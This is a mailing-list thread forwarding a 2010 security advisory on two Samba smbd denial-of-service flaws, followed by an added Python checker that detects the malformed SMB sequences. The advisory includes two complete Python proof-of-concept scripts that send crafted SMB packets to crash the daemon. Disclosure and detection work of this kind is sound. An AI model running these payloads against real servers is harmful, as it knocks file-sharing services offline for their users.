oss-sec mailing list archives
Re: Fwd: [Full-disclosure] stratsec Security Advisory SS-2010-005: Samba Multiple DoS Vulnerabilities
From: Josh Bressers <bressers () redhat com>
Date: Tue, 25 May 2010 13:53:46 -0400 (EDT)
Please use CVE-2010-1635

Sorry for the delay, I've been out for a few days.

--
JB

----- "Thomas Biege" <thomas () novell com> wrote:

So far no assignments were made, right?

On Thursday 20 May 2010 16:17:48 Thomas Biege wrote:

Hello oss-security,
was a CVE-ID assigned for this issue already?

Thanks,
Thomas

---------- Forwarded Message ----------

Subject: [Full-disclosure] stratsec Security Advisory SS-2010-005: Samba Multiple DoS Vulnerabilities
Date: Wednesday 12 May 2010, 09:00:07
From: stratsec Advisories <advisories () stratsec net>
To: "full-disclosure () lists grok org uk" <full-disclosure () lists grok org uk>

===============================================================================
stratsec Security Advisory: SS-2010-005
===============================================================================

Title: Samba Multiple DoS Vulnerabilities
Version: 1.0
Issue type: Multiple
Affected vendor: Samba
Release date: 12/05/2010
Discovered by: Laurent Gaffié
Issue status: Patch available

===============================================================================

Summary
-------

Two vulnerabilities were discovered within the Samba Smbd daemon which
allow an attacker to trigger a null pointer dereference or an uninitialized
variable read by sending a specific 'Sessions Setup AndX' query.

Successful exploitation of these issues will result in a denial of service.

Description
-----------

The Server Message Block (SMB) protocol, also known as Common Internet File
System (CIFS), acts as an application-layer protocol to provide shared
access to files, printers and Inter-Process Communication (IPC). It is also
a transport for Distributed Computing Environment / Remote Procedure Call
(DCE / RPC) operations. After negotiating an SMB communication the client
sends a 'Session Setup AndX' packet to negotiate a session in order to be
able to connect on a specific share.

To trigger the null pointer dereference, the client needs to send a crafted
SMB 'Negotiate Protocol' query with the SMB header 'Flags2' set to '0x0003'
(no Unicode), followed by a Session Setup AndX request with the SMB header
'Flags2' set to '0x8003' (Unicode). This sequence will result in a crash
within the Smbd process.

The uninitialised Variable Read issue can be triggered if the client sends a
crafted 'Session Setup AndX' with a 'security blob length' value set to
'\xff\xff'.

Impact
------

A remote attacker can cause a denial of service within the Samba daemon.

Affected products
-----------------

Samba <= 3.4.7 and Samba <= 3.5.1

Proof of concept
----------------

To trigger the uninitialised variable read issue, the following Python
proof of concept is available:

import sys,socket
from socket import *

if len(sys.argv)<=1:
    sys.exit('Usage: python smbd.py 10.0.0.12')

host = sys.argv[1],445

packetnego=(
"\x00\x00\x00\xaa"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x03\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00\x00"
"\x00\x87\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x1a\x45\x4e\x49"
"\x58\x20\x43\x4f\x52\x45\x00\x02\x4d\x49\x43\x52\x4f\x53\x4f\x46"
"\x54\x20\x4e\x45\x54\x57\x4f\x52\x4b\x53\x20\x31\x2e\x30\x33\x00"
"\x02\x4c\x41\x4e\x4d\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64"
"\x6f\x77\x73\x20\x66\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75"
"\x70\x73\x20\x33\x2e\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30"
"\x30\x32\x00\x02\x4c\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e"
"\x54\x20\x4c\x4d\x20\x76\x2e\x31\x32\x00"
)

payload=(
"\x00\x00\x01\xa3"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x03\x80\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x41\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00"
"\x00\x41\x00\x00\x00\x00\x00\x00\x00\x00\x00\xfe\xca\x00\x00\x00"
"\x00\x0d\x75\x00\xd6\x00\x04\x11\x0a\x00\x00\x00\x00\x00\x00\x00"
"\x18\x00\x18\x00\x00\x00\x00\x00\xd4\x00\x00\x00\x99\x00\x36\xed"
"\x7f\xf4\x6b\xeb\x15\x65\x2e\xb5\xc9\x70\xbe\x39\xfa\x89\x56\x5b"
"\xb0\xc2\x56\x40\x11\x6c\xe6\x33\x1e\x93\x02\xd3\xd3\x2e\x17\xad"
"\x1f\x37\x23\xcf\x7e\x4c\xd7\x64\xbe\xd5\xdc\x1f\x23\xe0\x69\x41"
"\x00\x64\x00\x6d\x00\x69\x00\x6e\x00\x69\x00\x73\x00\x74\x00\x72"
"\x00\x61\x00\x74\x00\x65\x00\x75\x00\x72\x00\x00\x00\x4e\x00\x54"
"\x00\x34\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00\x77"
"\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x31\x00\x33\x00\x38"
"\x00\x31\x00\x00\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f"
"\x00\x77\x00\x73\x00\x20\x00\x4e\x00\x54\x00\x20\x00\x34\x00\x2e"
"\x00\x30\x00\x00\x00\x00\x00\x04\xff\x00\x00\x00\x00\x00\x01\x00"
"\x31\x00\x00\x5c\x00\x5c\x00\x31\x00\x39\x00\x32\x00\x2e\x00\x31"
"\x00\x36\x00\x38\x00\x2e\x00\x30\x00\x2e\x00\x31\x00\x30\x00\x34"
"\x00\x5c\x00\x49\x00\x50\x00\x43\x00\x24\x00\x00\x00\x3f\x3f\x3f"
"\x3f\x3f\x00"
)

s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.send(''.join(packetnego))
s.send(''.join(payload))

To trigger the null pointer dereference issue this Python proof of concept
is available:

import sys,socket
from socket import *

if len(sys.argv)<=1:
    sys.exit('python smbd.py 10.0.0.12')

host = sys.argv[1],445

packetnego=(
"\x00\x00\x00\x85"
"\xff\x53\x4d\x42\x72\x00\x00\x00\x00\x18\x53\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x00\x00"
"\x00\x62\x00\x02\x50\x43\x20\x4e\x45\x54\x57\x4f\x52\x4b\x20\x50"
"\x52\x4f\x47\x52\x41\x4d\x20\x31\x2e\x30\x00\x02\x4c\x41\x4e\x4d"
"\x41\x4e\x31\x2e\x30\x00\x02\x57\x69\x6e\x64\x6f\x77\x73\x20\x66"
"\x6f\x72\x20\x57\x6f\x72\x6b\x67\x72\x6f\x75\x70\x73\x20\x33\x2e"
"\x31\x61\x00\x02\x4c\x4d\x31\x2e\x32\x58\x30\x30\x32\x00\x02\x4c"
"\x41\x4e\x4d\x41\x4e\x32\x2e\x31\x00\x02\x4e\x54\x20\x4c\x4d\x20"
"\x30\x2e\x31\x32\x00"
)

payload=(
"\x00\x00\x00\xec"
"\xff\x53\x4d\x42\x73\x00\x00\x00\x00\x18\x07\xc8\x00\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xff\xfe\x00\x00\x40\x00"
"\x0c\xff\x00\xec\x00\x04\x11\x32\x00\x00\x00\x00\x00\x00\x00"
"\xff\xff" ## Security blob set to \xff\xff here
"\x00\x00\x00\x00\xd4\x00\x00\xa0\xb1\x00\x60\x48\x06\x06\x2b"
"\x06\x01\x05\x05\x02\xa0\x3e\x30\x3c\xa0\x0e\x30\x0c\x06\x0a\x2b"
"\x06\x01\x04\x01\x82\x37\x02\x02\x0a\xa2\x2a\x04\x28\x4e\x54\x4c"
"\x4d\x53\x53\x50\x00\x01\x00\x00\x00\x07\x82\x08\xa2\x00\x00\x00"
"\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x05\x01\x28"
"\x0a\x00\x00\x00\x0f\x00\x57\x00\x69\x00\x6e\x00\x64\x00\x6f\x00"
"\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00\x20\x00"
"\x53\x00\x65\x00\x72\x00\x76\x00\x69\x00\x63\x00\x65\x00\x20\x00"
"\x50\x00\x61\x00\x63\x00\x6b\x00\x20\x00\x33\x00\x20\x00\x32\x00"
"\x36\x00\x30\x00\x30\x00\x00\x00\x57\x00\x69\x00\x6e\x00\x64\x00"
"\x6f\x00\x77\x00\x73\x00\x20\x00\x32\x00\x30\x00\x30\x00\x32\x00"
"\x20\x00\x35\x00\x2e\x00\x31\x00\x00\x00\x00\x00"
)

s = socket(AF_INET, SOCK_STREAM)
s.connect(host)
s.send(''.join(packetnego))
s.send(''.join(payload))

Solution
--------

Update to version 3.5.2 or 3.4.8 (http://samba.org/)

Response timeline
-----------------

* 09/03/2010 - Null pointer dereference issue reported to vendor.
* 09/03/2010 - Vendor acknowledges receipt of advisory 2 hours after
  receiving the initial email.
* 09/03/2010 - Vendor confirms issue presence, and provides a patch 3
  hours after receiving the initial email.
* 09/03/2010 - stratsec confirms patch resolves issue.
* 15/03/2010 - Uninitialised Variable Read issue reported to vendor.
* 15/03/2010 - Vendor confirms the issue and provides a patch 5 hours
  after receiving the initial email.
* 15/03/2010 - stratsec confirms patch resolves issue.
* 07/04/2010 - Version 3.5.2 released by the vendor fixing both issues.
* 11/05/2010 - Version 3.4.8 released by the vendor fixing both issues.
* 12/05/2010 - This advisory published.

References
----------

* Vendor advisory: http://samba.org/samba/history/samba-3.4.8.html
* https://bugzilla.samba.org/show_bug.cgi?id=7254
* stratsec would like to thank the Samba Security Team for their
  responsiveness while handling these issues.

===============================================================================

About stratsec
--------------

stratsec specialises in providing information security consulting and
testing services for government and commercial clients. Established in
2004, we are now one of the leading independent information security
companies in the Australasian and SE-Asian region, with offices throughout
Australia and in Singapore and Malaysia.

For more information, please visit our website at http://www.stratsec.net/

===============================================================================

--
Thomas Biege <thomas () novell com>, SUSE LINUX, Security Support & Auditing
SUSE LINUX Products GmbH, GF: Markus Rex, HRB 16746 (AG Nuernberg)
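A server-side or IDS-style sanity check for the two malformed client sequences the advisory describes (a Session Setup AndX whose 'security blob length' exceeds the bytes actually sent, and a Negotiate Protocol without the Flags2 Unicode bit followed by a Session Setup AndX with it set). This is an added example, not code from the advisory or from Samba; the frame builder, the constructed sample frames and the short SPNEGO stand-in are assumptions made for the demonstration.

```python
import struct
from collections import namedtuple

SMB_MAGIC = b"\xffSMB"
CMD_NEGOTIATE, CMD_SESSION_SETUP_ANDX = 0x72, 0x73
FLAGS2_UNICODE = 0x8000
Smb = namedtuple("Smb", "cmd flags2 words bytecount data")

def parse_smb(frame):
    """Split a NetBIOS-framed SMB1 message; None if truncated or not SMB."""
    nb_len = int.from_bytes(frame[1:4], "big") if len(frame) >= 4 else -1
    body = frame[4:4 + nb_len]
    if nb_len < 33 or len(body) < nb_len or body[:4] != SMB_MAGIC:
        return None
    cmd, flags2, wc = body[4], struct.unpack_from("<H", body, 10)[0], body[32]
    if len(body) < 35 + 2 * wc:            # parameter words plus 2-byte byte count
        return None
    bcc = struct.unpack_from("<H", body, 33 + 2 * wc)[0]
    return Smb(cmd, flags2, body[33:33 + 2 * wc], bcc, body[35 + 2 * wc:])

def blob_length_overrun(frame):
    """True when an extended-security Session Setup AndX (12 parameter words)
    declares a security blob longer than the bytes that actually follow."""
    p = parse_smb(frame)
    if p is None or p.cmd != CMD_SESSION_SETUP_ANDX or len(p.words) != 24:
        return False
    blob_len = struct.unpack_from("<H", p.words, 14)[0]   # SecurityBlobLength
    return blob_len > min(p.bytecount, len(p.data))

def unicode_flag_flip(negotiate_frame, setup_frame):
    """True when Negotiate Protocol had Flags2 Unicode clear but Session Setup sets it."""
    n, s = parse_smb(negotiate_frame), parse_smb(setup_frame)
    if n is None or s is None or n.cmd != CMD_NEGOTIATE or s.cmd != CMD_SESSION_SETUP_ANDX:
        return False
    return not n.flags2 & FLAGS2_UNICODE and bool(s.flags2 & FLAGS2_UNICODE)

def build(cmd, flags2, words, data):
    """Constructed NetBIOS + SMB1 frame (other header fields zeroed) for the samples."""
    hdr = SMB_MAGIC + bytes([cmd]) + b"\0" * 4 + b"\x18" + struct.pack("<H", flags2) + b"\0" * 20
    body = hdr + bytes([len(words) // 2]) + words + struct.pack("<H", len(data)) + data
    return b"\0" + len(body).to_bytes(3, "big") + body

def setup_words(blob_len):
    # AndX, reserved, AndXOffset, MaxBuffer, MaxMpx, VcNumber, SessionKey, BlobLen, Reserved, Caps
    return struct.pack("<BBHHHHIHII", 0xFF, 0, 0, 0x1104, 50, 0, 0, blob_len, 0, 0x80000000)

BLOB = b"\x60\x04\x06\x02\x00\x00"          # constructed 6-byte stand-in for a SPNEGO token
NEGOTIATE_ASCII = build(CMD_NEGOTIATE, 0x0003, b"", b"\x02NT LM 0.12\x00")
SETUP_OK = build(CMD_SESSION_SETUP_ANDX, 0xC807, setup_words(len(BLOB)), BLOB)
SETUP_OVERRUN = build(CMD_SESSION_SETUP_ANDX, 0xC807, setup_words(0xFFFF), BLOB)
SETUP_UNICODE = build(CMD_SESSION_SETUP_ANDX, 0x8003, setup_words(len(BLOB)), BLOB)
```

Both checks fail closed on truncated or non-SMB input, so a monitor built on them logs only frames it could fully parse.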